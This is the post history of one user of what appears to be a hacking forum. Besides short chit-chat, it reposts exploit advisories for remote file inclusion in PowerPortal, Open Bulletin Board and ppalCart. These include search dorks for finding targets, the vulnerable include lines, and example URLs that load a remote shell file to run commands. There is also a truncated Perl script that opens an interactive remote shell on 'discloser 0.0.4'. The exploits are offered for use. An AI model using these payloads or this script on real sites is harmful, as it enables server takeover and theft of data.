zRR
Members
Posts: 45
zRR's Achievements
Newbie (1/14)
Reputation: 10
-
Long live OLLYDBG. Respect.
-
Done http://eskyjets.com/crackMe.JPG
-
What is the password for the archive? :@ :?
-
I found out one of the bugs for getting mail from eBay
zRR replied to bossjuan's topic in Exploituri
Off-topic: everyone wants to put something in V.I.P ... If you don't want it to appear publicly, keep it to yourself and don't say anything more ... or, as Shocker said, you could have talked to someone who has V.I.P access and solved the problem. This way all you do is get everyone worked up ... :@
-
#==============================================================================================
# PowerPortal Remote File Include
#===============================================================================================
#
#Critical Level : Dangerous
#
# scripts: PowerPortal
# download: http://www.scripts.com/jump.php?ID=13698
#Version : v1.3a
#dork : Powered by PowerPortal v1.3a
# note not tested on other version
#================================================================================================
#Bug in :
#/index.php
#
#================================================================================================
#Vuln Code :
# think
#================================================================================================
#
#Exploit :
#
#http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?
#
#
#================================================================================================
#Discovered By : v1per-haCker
#
#Contact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen
#thanx to str0ke
#and all members in XP10_hackEr Team
#WWW.XP10.COM
==================================================================================================
# milw0rm.com [2006-09-29]
-
+--------------------------------------------------------------------
+
+ Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: Open Bulletin Board 1.0.8
+ Vendor ...........: http://www.openbb.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Discovered by ..........: Eddy_BAck0o
+ Contact ...........: l0x3[at]hotmail.com
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+ ./index Directory ... ~ [index.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ require $root_path . "base.php"; <--- 30 - 380
+ require $root_path . "base.php"; <--- 46 - 380
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+ ~ [collector.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ root_path = "./"; <--- 24 - 194
+ require $root_path . "base.php"; <--- 159 - 194
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+ Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;....
+--------------------------------------------------------------------
+--------------------------------------------------------------------
-
I saw it too ... Other nationalities moved faster than us.
-
google dork :"powered by: profitCode"
exploit: http:///index.php?proMod=http://shell.txt?
discovered by momo26 !!!!!!!!!!!!!!!

+--------------------------------------------------------------------
+
+ ppalCart V(2.5 EE) Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Affected Software .: Software
+ Version .............: ppalCart 2.5 EE
+ Vendor ...........: http://www.profitcode.com
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: momo26
+ Written by ..........: Eddy_BAck0o - www.LEzr.com/vB
+ Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+ ./index Directory ...
+ [index.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include $docroot . "js/css/shop-custom.php";
+include $docroot . "js/css/shop-default.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 50 - 349
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+else if($proMod) {
+include "$proMod" . ".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 288 - 349
+Ex --> http://www.victom.com/index.php?proMod=htt...com/r0x.txt?cmd
+
+-------------------------------------------------------------------
+-------------------------------------------------------------------
+ [mainpage.php]
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 158 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/newitems.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 284 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/specials.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 287 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "cstmincs/cstmbanner$langFile.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 290 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "tplates/upselladvert.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 292 - 308
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+include "$docroot" . "mainincs/upsellproducts.php";
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Line --> 298 - 308
+Ex --> http://www.victom.com/mainpage.php?docroot...com/r0x.txt?cmd
+
+--------------------------------------------------------------------
+Eddy_BAck0o ;
+--------------------------------------------------------------------

# milw0rm.com [2006-09-07]

Good luck
-
Well, if it's Remote File, what do you think it can do?
-
#!/usr/bin/perl
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: Dr.t3rr0r1st #
# < www.Aria-security.net > #
# Gr33t to:outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp #
# Special Thanx To All Aria-Security Users #
###########################################################################################
use LWP::UserAgent;
print "\n === discloser 0.0.4 Remote File Inclusion\n";
print "\n === Discovered by OutLaw .\n";
print "\n === http://www.Aria-Security.Net\n";
$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];
if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}
while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[n]/[
-
QUOTE("Criminal")
Exactly, the forum
-
I'm new, and I really like the forum ... It's awesome ... Keep it up, it's good. Respect to everyone.